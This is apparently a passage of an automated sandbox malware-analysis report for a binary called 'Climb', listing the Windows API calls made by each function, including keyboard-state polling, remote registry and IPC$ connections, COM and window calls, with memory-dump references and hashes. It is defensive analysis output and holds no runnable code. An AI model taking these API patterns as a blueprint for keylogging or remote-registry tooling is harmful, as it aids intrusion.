                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0011AAE7
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0011AAF5
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0011AB1E
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0011AB2C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0011AB55
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0011AB63
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: 92dfe3a1382f3da1b83eac7735e161de8e14b88fcfbe159484687fd2ffe1b271
                                                                                                                                                                          • Instruction ID: 0fcbc562d67c2b22cbb7bdeb254ddb5ef18dac67d45018c676211805a50b89bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 92dfe3a1382f3da1b83eac7735e161de8e14b88fcfbe159484687fd2ffe1b271
                                                                                                                                                                          • Instruction Fuzzy Hash: 99510860A097C829FB39D7709850BEABFB58F12344F8845A9D5C20B1C2DB649BCCC763
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00116649
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00116662
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001166C0
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 001166D0
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001166E2
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00116736
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00116744
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00116756
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00116798
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 001167AB
                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001167C1
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 001167CE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                          • Opcode ID: 719eab8262debaf8e0c2977e14541bac4fa0355fd6bbaf3a56c426336fa85e3b
                                                                                                                                                                          • Instruction ID: a7c8bac2140e6834c652880b42b24e11956e791528cee35f10848f0432753791
                                                                                                                                                                          • Opcode Fuzzy Hash: 719eab8262debaf8e0c2977e14541bac4fa0355fd6bbaf3a56c426336fa85e3b
                                                                                                                                                                          • Instruction Fuzzy Hash: DC513DB5B00205AFDF18CF68DD89AAEBBB5FB48315F108129F919E66A0D7719D40CB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B1488,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000B1865
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 000B1521
                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,000B145A,00000000,?), ref: 000B15BB
                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 000F29B4
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000F29E2
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000F29F9
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000), ref: 000F2A15
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000F2A27
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 641708696-0
                                                                                                                                                                          • Opcode ID: 01429105f8999dad49a4fc8db3315715a288fa25c330477d3575ab9e600d0b7f
                                                                                                                                                                          • Instruction ID: 370428a7cc9c2d82492ed266f5dc965b7c4725016c4244dd1b0b737bd7f5c157
                                                                                                                                                                          • Opcode Fuzzy Hash: 01429105f8999dad49a4fc8db3315715a288fa25c330477d3575ab9e600d0b7f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B618931901B25DFDB369F14D959BBA77F1FB80326F904018E0429BA70C774A991DB81
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B2234: GetWindowLongW.USER32(?,000000EB), ref: 000B2242
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 000B2152
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                          • Opcode ID: c2a1d36bb7f53f02c175715599e854fd57dc2eb8b6e3f06803ee55886e89b8c8
                                                                                                                                                                          • Instruction ID: 2129278eca5c365930ebae304e087d7a9606c507a2b9581298a5e3d8e7d308c0
                                                                                                                                                                          • Opcode Fuzzy Hash: c2a1d36bb7f53f02c175715599e854fd57dc2eb8b6e3f06803ee55886e89b8c8
                                                                                                                                                                          • Instruction Fuzzy Hash: B541AD35200644AFDF209F389C48BF93BB5AB56730F154A55FAA28B6E1C7318D82EB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00100D31,00000001,0000138C,00000001,00000000,00000001,?,0012EEAE,00182430), ref: 0011A091
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00100D31,00000001), ref: 0011A09A
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00100D31,00000001,0000138C,00000001,00000000,00000001,?,0012EEAE,00182430,?), ref: 0011A0BC
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00100D31,00000001), ref: 0011A0BF
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011A1E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                          • Opcode ID: 29b7ef471d5661006d1fe8d2de269e50a1014bc4f6eac99b78146775af790c69
                                                                                                                                                                          • Instruction ID: e5482ec6be9cbf1f09c6f4ecc56930764dfa4c09f4c9641cbadc2c8aa888344e
                                                                                                                                                                          • Opcode Fuzzy Hash: 29b7ef471d5661006d1fe8d2de269e50a1014bc4f6eac99b78146775af790c69
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F411E7290020DABCF15EBE0DD56EEEB779AF58700F500065B505B20A3EB756F89CB61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00111093
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001110AF
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001110CB
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001110F5
                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0011111D
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00111128
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0011112D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                          • Opcode ID: 710b53c0837c67b680ce848824250653cd991c14af4a6c842c4a0c82a094e32c
                                                                                                                                                                          • Instruction ID: 6b27fa69712d48eb2b6a2158c9577e974df9deec432479f4387aa8941e0ba8ff
                                                                                                                                                                          • Opcode Fuzzy Hash: 710b53c0837c67b680ce848824250653cd991c14af4a6c842c4a0c82a094e32c
                                                                                                                                                                          • Instruction Fuzzy Hash: A3410876D10229AFCF25EBA4EC85DEEB778BF08740F004129FA01A3162EB719E44CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00144AD9
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00144AE0
                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00144AF3
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00144AFB
                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00144B06
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00144B10
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00144B1A
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00144B30
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00144B3C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                          • Opcode ID: 3f7db7892d97f6b712c6d311f7688ab3ecc43435a7ae217daa49f1e79d283f61
                                                                                                                                                                          • Instruction ID: c329e8719e2ae8448ff36b1a68d946656c1542f11f1d835f959d2d18a8c45704
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f7db7892d97f6b712c6d311f7688ab3ecc43435a7ae217daa49f1e79d283f61
                                                                                                                                                                          • Instruction Fuzzy Hash: 92318D76100215BBDF129FA4EC08FDA3BA9FF0E724F110220FA15A61B0C735D8A0DB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001346B9
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001346E7
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001346F1
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013478A
                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0013480E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00134932
                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0013496B
                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,00150B64,?), ref: 0013498A
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0013499D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00134A21
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00134A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                          • Opcode ID: bae5bcc085bfa2169f9f293ba4a87871dd0c95fb2153a7c9fbb0c7c435c4d017
                                                                                                                                                                          • Instruction ID: 7ab379e8ac28ae62aa9dd52731f0ae8ad137a28b091951634e046838f80fd6e3
                                                                                                                                                                          • Opcode Fuzzy Hash: bae5bcc085bfa2169f9f293ba4a87871dd0c95fb2153a7c9fbb0c7c435c4d017
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC154B1608301AFD700DF68C88496BBBE9FF89748F00495DF98A9B261DB31ED45CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00128538
                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001285D4
                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 001285E8
                                                                                                                                                                          • CoCreateInstance.OLE32(00150CD4,00000000,00000001,00177E8C,?), ref: 00128634
                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001286B9
                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00128711
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0012879C
                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001287BF
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 001287C6
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0012881B
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00128821
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                          • Opcode ID: 3eb174b03e9ffe73b490a732dd70fb946cbb3196c61c0c51573897fe371b32a9
                                                                                                                                                                          • Instruction ID: 7426ec6eecf1d8a521c17592c6ec506c60cfd6393071fe4351cbd0b8f9c83888
                                                                                                                                                                          • Opcode Fuzzy Hash: 3eb174b03e9ffe73b490a732dd70fb946cbb3196c61c0c51573897fe371b32a9
                                                                                                                                                                          • Instruction Fuzzy Hash: C8C12A75A00215EFDB14DFA4D888DAEBBF9FF48304B148498E419DB662DB31ED45CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0011039F
                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 001103F8
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0011040A
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0011042A
                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0011047D
                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00110491
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001104A6
                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 001104B3
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001104BC
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001104CE
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001104D9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                          • Opcode ID: 019a5ebb0ce3fd0a92d52ac583e11b304e5154901fc177550b5ced224125c50c
                                                                                                                                                                          • Instruction ID: 57b8994560081d846c99b07d867bfb9f81323e24fbbb21f6254d266e3fdf5e77
                                                                                                                                                                          • Opcode Fuzzy Hash: 019a5ebb0ce3fd0a92d52ac583e11b304e5154901fc177550b5ced224125c50c
                                                                                                                                                                          • Instruction Fuzzy Hash: 45417F35E00219EFCF15DFA4D8849EE7BB9FF18354F048029E915A7A61CB74A985CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0011A65D
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0011A6DE
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0011A6F9
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0011A713
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0011A728
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0011A740
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0011A752
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0011A76A
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0011A77C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0011A794
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0011A7A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: be0a28745b5d75ebf8d962ebb67216d71ba2c55208d639f4ab3bae559e66ce33
                                                                                                                                                                          • Instruction ID: 4aafae76361a17514e25fdb02d1b3b93d120ee9d2e73436f3c44f7cd96646aaa
                                                                                                                                                                          • Opcode Fuzzy Hash: be0a28745b5d75ebf8d962ebb67216d71ba2c55208d639f4ab3bae559e66ce33
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B41FA786067C96DFF39976084143F5BEB06F12304F88806DD6C64A5C2EBA59EC8C793
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                          • Opcode ID: 546c00906134f496f01c23b7afb3255131d3c178e150e56d32f876b89ce4344c
                                                                                                                                                                          • Instruction ID: bfd656bcb212e8bf2e1b298e844086b5cf92ac93a7c5bddd607830d3d4e6da12
                                                                                                                                                                          • Opcode Fuzzy Hash: 546c00906134f496f01c23b7afb3255131d3c178e150e56d32f876b89ce4344c
